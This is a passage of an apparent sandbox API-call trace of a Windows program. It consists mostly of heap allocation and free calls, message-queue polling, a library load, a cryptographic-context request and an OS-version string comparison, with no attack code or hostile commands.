lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.673] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0188.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.674] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.674] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.674] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0188.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.675] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.675] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0188.675] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.675] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.675] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.675] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.675] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.675] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.675] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0188.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0188.675] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.675] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.675] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0188.675] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.675] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0188.675] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0188.676] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0188.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0188.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.676] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xaa3868) returned 1 [0188.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0188.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0188.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0188.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0188.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0188.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0188.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0188.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.681] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0188.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0188.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0188.682] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0188.682] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0188.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2db8 [0188.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0188.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0188.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.684] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0188.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0188.684] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0188.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0188.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0188.685] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.685] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.685] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.686] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0188.686] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0188.686] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 